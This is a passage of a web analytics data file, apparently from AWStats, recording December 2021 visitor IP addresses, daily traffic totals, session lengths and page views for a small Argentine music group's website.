84.247.48.3 2 2 19661 20211216151201
81.6.43.9 2 2 22752 20211221163302
176.214.52.42 2 2 22752 20211201104151
45.129.18.24 1 1 0 20211207205747
90.188.255.142 1 1 11376 20211215184802
185.255.96.99 1 1 11376 20211205024512
185.51.247.130 2 2 22752 20211227125957
34.217.104.119 1 20 1031394 20211207210702
125.209.235.178 0 3 181351 
95.65.81.152 2 2 22752 20211209092124
121.5.219.20 1 1 8285 20211208003228
20.84.225.129 2 2 166512 20211217200458
188.163.73.203 1 1 11376 20211214163121
171.13.14.83 0 4 43489 
20.92.112.196 1 1 8285 20211231014007
3.250.190.193 1 1 8285 20211205002627
167.62.210.8 1 20 1031394 20211228020705
107.189.31.181 2 2 22752 20211217093514
128.199.109.248 1 1 8285 20211229111240
35.86.90.121 1 20 1031394 20211225074114
185.27.99.116 1 1 8285 20211215042845
91.79.16.127 1 1 8285 20211213154619
104.149.129.46 1 1 8285 20211203082505
193.169.87.194 3 3 34128 20211221135522
5.102.22.167 3 23 1057185 20211214155452
159.223.84.85 3 3 24855 20211204165735
37.19.223.101 2 2 19661 20211203164400
46.21.250.244 2 2 22752 20211208233737
52.77.236.76 1 1 8285 20211215220055
94.103.81.70 1 1 11376 20211229091022
42.193.45.103 0 1 3936 
52.87.44.246 1 2 8522 20211204192903
185.92.150.190 2 2 22752 20211231011023
193.201.127.11 1 1 11376 20211203212352
46.161.11.28 2 2 22752 20211229172704
84.17.48.197 1 1 11376 20211219130659
123.6.49.38 1 1 8285 20211231235859
91.208.197.96 1 1 8285 20211201113132
3.142.173.18 3 4 25092 20211231120401
49.234.233.35 2 3 8522 20211203212018
195.114.146.174 1 1 11376 20211201214620
198.98.183.39 2 2 19661 20211207194411
3.251.67.123 1 1 8285 20211207223132
34.220.121.67 1 20 1031394 20211201035726
171.13.14.48 1 1 8285 20211229080901
137.184.114.246 1 1 8285 20211229072743
180.167.101.134 1 1 11376 20211213124527
20.92.75.186 1 1 8285 20211218213130
191.101.132.95 1 1 8285 20211208225631
5.161.57.81 1 1 8879 20211229140144
191.101.132.112 1 1 8285 20211224215425
1.192.195.11 1 1 8285 20211209234304
54.185.15.114 1 1 8285 20211209154133
185.220.101.153 2 2 22752 20211223121310
167.99.127.156 1 1 8285 20211223072213
93.159.230.88 1 1 8285 20211224144906
146.19.109.108 1 1 11376 20211229235047
94.25.229.136 1 1 11376 20211211094256
194.5.193.183 3 3 34128 20211205132427
20.94.224.87 1 1 795 20211224090342
51.161.54.13 3 3 27946 20211220001855
65.21.206.46 1 1 8285 20211214093331
191.126.43.56 2 23 1057836 20211201103739
195.19.29.171 1 1 11376 20211219192342
137.184.37.207 1 1 17168 20211229144353
64.233.172.117 1 2 12611 20211215034741
91.79.32.204 1 1 8285 20211211205415
65.21.206.45 1 1 8285 20211219011058
67.201.33.10 2 2 22752 20211211200715
199.36.221.74 1 1 11376 20211205012212
34.250.61.227 1 1 8285 20211212201807
88.201.141.106 1 1 11376 20211210135811
5.161.57.42 1 1 8108 20211226015658
195.208.119.161 1 1 11376 20211216132650
42.192.17.155 1 1 8285 20211201064822
159.223.0.148 1 1 8108 20211230132125
143.244.51.68 2 2 19661 20211213225206
58.48.227.198 1 17 661643 20211207180409
34.220.203.137 1 20 1031394 20211229115850
147.182.184.114 1 1 11376 20211225220254
186.22.18.35 1 20 1031394 20211212164659
213.139.193.221 2 2 22752 20211213094433
92.124.34.14 1 1 11376 20211224175924
34.209.225.170 1 1 0 20211217163027
104.144.45.183 1 1 11376 20211209003106
91.206.168.4 2 2 19661 20211207041431
31.40.252.97 1 1 11376 20211216143933
34.219.184.209 1 3 153399 20211220180047
54.74.73.105 1 1 8285 20211211031756
45.72.48.130 2 2 19661 20211231081846
188.168.109.125 1 1 11376 20211213075351
34.216.181.214 3 41 2062788 20211225074113
36.110.211.3 0 2 32870 
91.242.162.45 1 1 8285 20211217160447
159.223.125.111 1 1 7184 20211226020206
191.101.217.220 2 2 19661 20211225205857
45.82.81.105 1 1 11376 20211219143652
138.199.59.179 2 2 19661 20211227215611
1.192.192.6 0 5 269641 
37.233.17.225 1 1 11376 20211213185948
2.56.59.9 2 2 1590 20211219125512
167.172.62.208 1 1 8285 20211226073825
84.17.52.84 1 1 11376 20211225115027
188.191.23.209 2 2 22752 20211214160715
138.128.46.106 1 1 8285 20211224162701
167.114.173.203 1 1 8285 20211210084720
93.158.92.221 1 1 8285 20211210215543
64.246.165.210 1 1 8285 20211227225945
52.33.77.11 2 4 153399 20211210171114
110.164.199.243 2 2 16570 20211220001612
159.65.142.178 1 1 795 20211208064648
45.128.125.71 1 1 11376 20211206220846
128.14.209.242 1 1 8285 20211213190524
3.250.200.182 2 2 19661 20211211035507
103.241.227.118 1 1 11376 20211213080612
159.223.44.75 3 3 24855 20211215130307
134.122.0.77 2 2 16570 20211214044102
45.129.18.21 1 1 0 20211201164247
45.129.18.166 1 1 0 20211230075507
117.190.148.2 1 1 11376 20211217101206
94.25.229.137 1 1 11376 20211213195540
34.220.167.143 1 1 0 20211203101859
46.27.254.18 1 20 1031394 20211228133402
157.55.39.26 0 1 40978 
23.236.146.162 2 2 22752 20211202131731
94.124.78.222 1 1 11376 20211228044336
195.246.120.82 1 1 11376 20211217122011
167.94.138.41 1 1 8285 20211208091805
185.220.100.252 1 1 11376 20211211114814
179.60.8.206 2 23 1057836 20211213204119
155.94.216.199 3 3 24855 20211228152917
5.140.233.250 1 1 11376 20211231071149
23.226.65.104 1 1 8285 20211228131529
178.184.176.231 1 1 11376 20211228002504
63.35.198.9 1 1 8285 20211210174352
186.127.133.168 2 23 1057836 20211205002318
93.23.196.98 1 1 8285 20211228133743
65.21.206.44 2 2 16570 20211226080005
194.32.122.46 2 2 22752 20211214145545
150.129.201.30 1 1 11376 20211226153002
94.25.228.194 1 1 11376 20211209235440
104.244.77.101 1 1 11376 20211201032931
67.188.184.31 1 20 1031394 20211225145134
73.254.235.138 0 5 87676 
95.55.61.50 3 3 34128 20211224004355
35.86.105.240 1 1 8285 20211202151217
103.241.227.107 2 2 22752 20211202202739
54.190.110.91 1 2 8522 20211222015632
51.104.56.9 1 1 8285 20211209070910
199.187.211.32 3 3 27946 20211227141107
118.67.216.94 1 1 11376 20211213053804
83.138.48.152 1 1 11376 20211203140107
34.219.180.230 1 1 0 20211222015631
34.244.145.9 1 1 8285 20211212124428
156.146.35.23 2 2 19661 20211211205417
52.185.74.44 2 2 166512 20211229160548
64.113.32.29 2 2 22752 20211216061630
54.189.30.61 1 2 8522 20211224081225
46.116.186.50 1 1 11376 20211208222919
54.70.111.34 1 1 0 20211228141714
37.20.248.213 1 1 11376 20211216171236
176.125.231.12 2 2 19661 20211215010339
178.122.237.64 1 1 11376 20211226075318
190.192.251.161 2 51 1963689 20211210004401
183.88.99.21 1 1 8285 20211213000717
125.209.235.185 0 2 154019 
69.160.160.57 1 1 8285 20211201222322
46.161.11.11 1 1 11376 20211204082418
54.189.88.123 1 3 153399 20211206034837
66.115.149.84 2 2 19661 20211204224544
20.79.224.125 1 1 11376 20211202232940
94.124.78.248 1 1 11376 20211231074550
199.187.211.225 2 2 19661 20211209170454
157.55.39.80 0 1 20412 
66.115.149.105 2 2 19661 20211211215112
125.209.235.175 0 1 20412 
130.255.166.146 1 1 8285 20211231161804
84.17.46.185 2 2 19661 20211225071552
69.160.160.61 1 1 8285 20211212005550
20.212.3.206 3 3 24855 20211215054820
18.237.119.11 1 1 0 20211215055003
52.208.173.96 1 1 8285 20211213112548
72.13.46.5 3 3 27946 20211208095659
138.199.36.149 1 1 11376 20211212140957
188.126.79.28 2 2 19661 20211209014833
35.86.132.66 1 1 8285 20211210153555
109.70.100.21 2 2 22752 20211219053357
23.236.247.169 1 1 11376 20211205052838
167.94.138.44 1 1 8285 20211227202109
188.122.82.146 1 1 11376 20211201101330
212.102.40.49 1 1 11376 20211203201155
217.138.209.114 1 1 11376 20211207195412
185.220.101.167 1 1 11376 20211209210326
54.154.140.201 2 2 19661 20211212013154
178.168.201.244 2 2 22752 20211205160233
20.115.31.131 3 3 24855 20211227021603
20.122.67.214 1 1 8285 20211212155943
123.6.49.6 2 2 16570 20211220095611
35.165.83.20 1 1 8285 20211202150748
221.4.205.30 1 1 11376 20211221144030
203.229.155.49 1 1 0 20211225131145
194.233.87.214 1 1 11376 20211216025045
1.192.195.5 1 1 8285 20211221041011
45.86.203.200 2 2 22752 20211217011107
54.213.3.229 2 2 0 20211213071858
51.159.23.22 1 1 11376 20211223102949
178.22.49.219 1 1 11376 20211220070508
185.108.208.163 3 3 31037 20211221192512
176.114.190.126 2 2 22752 20211227061347
193.38.235.152 1 1 11376 20211214122012
200.108.145.9 3 24 1193078 20211207171406
193.189.100.205 2 2 22752 20211204170404
103.89.137.28 1 1 8285 20211212102809
198.204.238.212 3 3 33738 20211217141412
1.220.75.27 1 1 11376 20211208024037
139.59.228.139 1 1 0 20211218202752
144.172.118.4 2 2 22752 20211217091318
206.253.164.110 1 1 11376 20211211133436
3.248.221.33 1 1 8285 20211211133902
167.71.4.78 1 1 8879 20211226000328
178.159.107.76 1 1 8285 20211219220044
45.86.66.176 1 1 8285 20211231152836
23.229.109.156 1 1 8285 20211215205640
34.243.81.107 2 2 19661 20211212220506
23.224.144.88 2 2 22752 20211228175306
91.247.220.24 2 2 22752 20211213212436
103.21.163.70 1 1 11376 20211213053740
3.143.236.85 3 3 24855 20211220144118
118.201.86.152 1 1 11376 20211203041452
158.46.99.43 1 1 11376 20211231032919
185.108.106.107 2 2 19661 20211217040622
216.145.11.94 1 1 8285 20211207173105
34.221.177.5 1 1 8285 20211208151248
2.92.197.125 1 1 11376 20211206054030
52.89.239.76 1 3 153399 20211228141715
193.169.253.168 3 3 24855 20211222155203
121.200.63.26 2 2 22752 20211213111214
5.165.133.255 1 1 11376 20211231081721
216.107.129.104 2 2 19661 20211231042737
178.159.37.84 1 1 11376 20211223154754
54.201.164.103 2 5 161921 20211224141743
1.169.128.99 1 1 11376 20211221075207
163.172.51.41 2 2 22752 20211212211057
52.36.174.152 1 1 8285 20211223141916
52.213.251.210 2 2 19661 20211213051917
103.216.82.153 1 1 8285 20211219153604
78.138.99.184 2 2 22752 20211227234717
167.172.62.223 3 3 35728 20211229102622
46.161.48.61 1 1 11376 20211227203318
159.223.125.148 1 1 8285 20211225193726
20.120.37.182 1 1 8285 20211213010049
45.81.226.10 1 1 11376 20211206214119
111.240.201.106 1 1 11376 20211218062630
93.159.230.89 1 1 8285 20211210144849
170.155.100.128 3 3 34128 20211217215859
95.217.122.149 2 2 22752 20211207093315
195.46.190.111 3 3 34128 20211215164451
34.213.185.148 1 1 8285 20211203155844
167.248.133.60 1 1 8285 20211229091021
154.55.88.154 1 1 8108 20211215205645
171.13.14.84 1 12 899216 20211229080738
191.101.132.155 2 2 22752 20211205120250
85.208.186.198 1 1 11376 20211231005810
213.55.224.167 2 2 16570 20211228062335
35.162.171.253 1 1 8285 20211210153529
209.58.142.158 1 1 8285 20211228091444
171.13.14.42 0 2 75221 
54.245.31.197 1 1 8285 20211204151834
103.209.65.12 1 1 11376 20211215233357
167.250.5.7 0 32 2321 
156.146.56.105 3 3 24855 20211203165626
18.236.180.145 1 1 8285 20211209154149
54.188.164.159 1 1 0 20211210154153
171.109.216.154 0 1 4326 
94.101.87.144 1 1 11376 20211217062845
91.78.115.117 1 1 11376 20211213134949
178.168.220.14 2 2 22752 20211231011440
109.252.53.54 1 1 11376 20211208112720
18.236.252.213 1 20 1031394 20211215055026
34.244.41.14 1 1 8285 20211211232735
46.183.220.238 2 2 19661 20211207053906
45.82.69.96 2 2 22752 20211218105410
45.87.212.182 2 2 19661 20211202230836
154.28.188.30 1 1 11376 20211225222915
20.84.225.128 2 2 166512 20211205135829
185.220.102.251 1 1 11376 20211227172509
66.94.115.45 2 2 16570 20211216023813
185.253.162.141 1 1 11376 20211227163351
145.255.22.50 1 1 11376 20211210090845
34.247.86.183 1 1 8285 20211213053459
45.91.22.167 2 2 22752 20211215065719
170.51.100.234 4 40 1327911 20211202002734
54.154.108.25 2 2 19661 20211211021748
185.82.126.222 2 2 22752 20211210225417
34.253.236.9 1 1 8285 20211211181131
112.46.78.130 3 3 31037 20211203204653
91.242.162.70 1 1 8285 20211230014930
137.184.37.173 1 1 8396 20211229101737
72.255.9.84 2 2 22752 20211214093348
77.58.212.185 2 26 1318707 20211214034126
188.191.233.57 2 2 22752 20211207181839
154.6.26.47 1 1 11376 20211229082256
94.237.78.215 1 1 8285 20211212055156
62.171.142.3 2 2 22752 20211229101508
94.130.106.243 1 1 8285 20211228015837
20.124.198.70 1 1 795 20211204160527
1.192.192.4 1 3 153399 20211209235530
125.209.235.186 0 1 9653 
94.25.229.94 1 1 11376 20211214144158
125.209.235.180 0 2 44914 
91.221.66.52 1 1 11376 20211228203209
92.207.253.226 1 1 11376 20211211204239
88.218.66.178 1 1 11376 20211205052857
78.154.170.2 2 2 22752 20211214092155
45.94.23.76 1 1 11376 20211205055535
45.132.115.187 1 1 8285 20211201200553
34.209.168.98 1 20 1031394 20211225123830
83.169.216.152 1 1 11376 20211209222157
52.13.51.165 2 4 153399 20211220180043
37.19.223.238 2 2 19661 20211228001316
103.250.166.4 1 1 11376 20211202195227
34.220.19.9 1 1 8285 20211208151230
54.212.35.146 1 1 0 20211209090401
125.209.235.179 0 2 55776 
34.214.122.201 1 7 208702 20211218044019
34.213.47.70 1 1 8285 20211201153203
157.55.39.66 0 1 21533 
23.83.131.203 2 2 19661 20211217141216
65.108.20.35 1 1 11376 20211228084122
171.13.14.43 0 2 13468 
1.169.129.166 1 1 11376 20211204103446
161.35.232.216 2 2 19984 20211229170501
125.209.235.171 0 1 23217 
52.42.10.227 1 1 8285 20211207151501
91.199.212.132 0 12 924 
159.223.34.106 3 3 24855 20211219012955
163.53.209.7 1 1 11376 20211213034632
221.215.223.75 1 1 8285 20211217101053
195.181.174.229 2 2 19661 20211217231522
54.191.25.208 2 2 0 20211207210700
185.220.100.249 1 1 11376 20211201032902
125.209.235.181 0 1 48944 
54.186.130.254 2 3 8522 20211223141915
54.213.37.44 1 2 8522 20211230114916
85.215.224.112 1 1 8285 20211217054521
157.55.39.162 0 1 9653 
34.214.106.230 2 21 1031394 20211230114915
79.173.83.153 2 2 22752 20211222225305
165.231.103.182 1 1 8285 20211225080214
54.185.209.120 1 3 153399 20211218044519
34.125.96.109 1 1 8285 20211205110137
91.227.182.217 1 1 11376 20211217173119
23.90.160.146 1 1 8285 20211222181720
89.163.249.244 1 1 11376 20211211114818
34.220.127.124 1 1 0 20211204192817
157.230.102.166 1 1 0 20211209090701
161.117.10.46 1 1 11376 20211202220509
212.192.241.6 1 1 795 20211208140757
150.129.151.62 1 1 11376 20211217003115
128.199.95.173 3 3 24855 20211214121451
52.12.36.31 1 1 8285 20211201153131
65.21.206.43 1 1 8285 20211210132926
1.116.195.130 1 1 0 20211215065709
95.55.164.101 1 1 11376 20211202125402
103.250.157.43 2 2 22752 20211213024533
207.46.13.139 0 2 144875 
167.248.133.43 1 1 8285 20211221091151
89.187.164.130 2 2 19661 20211202152754
161.117.10.233 3 3 34128 20211231034924
35.165.235.171 2 13 505428 20211209092242
68.183.3.232 1 1 24236 20211225235640
139.59.106.163 3 3 24855 20211219192221
110.93.150.218 1 1 8285 20211213145545
185.220.101.187 2 2 22752 20211220083651
49.234.43.244 0 1 34243 
5.161.58.19 3 3 29346 20211229103230
34.217.103.47 2 40 2062788 20211203101900
52.214.149.74 2 2 19661 20211213223204
52.88.0.228 1 1 8285 20211217163540
194.93.1.231 1 1 11376 20211202052803
184.22.225.44 1 1 11376 20211201155153
103.216.82.20 2 2 19661 20211221011651
54.37.16.241 1 1 11376 20211228095050
195.154.61.206 1 1 8285 20211229061406
46.161.11.10 1 1 11376 20211216191551
103.251.225.16 2 2 22752 20211215054230
91.215.203.9 1 1 11376 20211205202955
18.202.243.102 1 1 8285 20211212233027
167.99.209.88 1 1 24236 20211229133059
36.110.211.5 1 2 29818 20211229081329
181.165.151.129 1 1 8285 20211205215551
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20211201 24 64 2288931 22
20211202 29 103 3608753 19
20211203 33 77 2513766 26
20211204 21 23 183412 15
20211205 19 40 1385715 15
20211206 22 62 2096032 17
20211207 26 84 3075912 20
20211208 36 55 1349564 23
20211209 22 47 1307437 18
20211210 24 110 3576979 18
20211211 47 87 2667525 29
20211212 21 40 1218731 17
20211213 42 99 3137931 31
20211214 34 124 4365179 22
20211215 31 53 1313498 22
20211216 24 47 1312727 16
20211217 40 112 10684500 28
20211218 28 115 28639980 13
20211219 19 24 254839 14
20211220 23 30 637322 16
20211221 16 16 160379 11
20211222 21 73 2798549 12
20211223 11 11 104487 10
20211224 10 31 1105125 10
20211225 27 133 5259977 22
20211226 15 34 1159862 14
20211227 20 71 2842686 13
20211228 26 157 4346260 22
20211229 29 76 2716914 25
20211230 11 13 105431 8
20211231 41 131 20724680 24
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
0s-30s 546
30mn-1h 1
2mn-5mn 13
15mn-30mn 2
30s-2mn 7
5mn-15mn 3
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 17
/ 355 2709195 286 237
/contacto.html 339 3856464 249 285
/integrantes.html 11 193888 3 5
/musica.html 10 88790 2 6
/.well-known/ 9 7155 9 9
/nuestra_historia.html 9 154512 2 4
/redes_sociales.html 8 71776 2 3
/agenda.html 8 64048 2 3
/galeria.html 7 83846 2 3
/letras.html 6 499536 3 3
/benefactores.html 6 48648 3 3
/director.html 6 41980 3 2
/videos.html 6 43104 2 2
http://gcc.org.ar/contacto.html 4 45504 4 4
/assets/socicon/fonts/socicon.woff 4 154800 0 2
/assets/web/assets/mobirise-icons/mobirise-icons.ttf 3 154392 0 1
/boletines.html 1 14949 0 0
END_SIDER
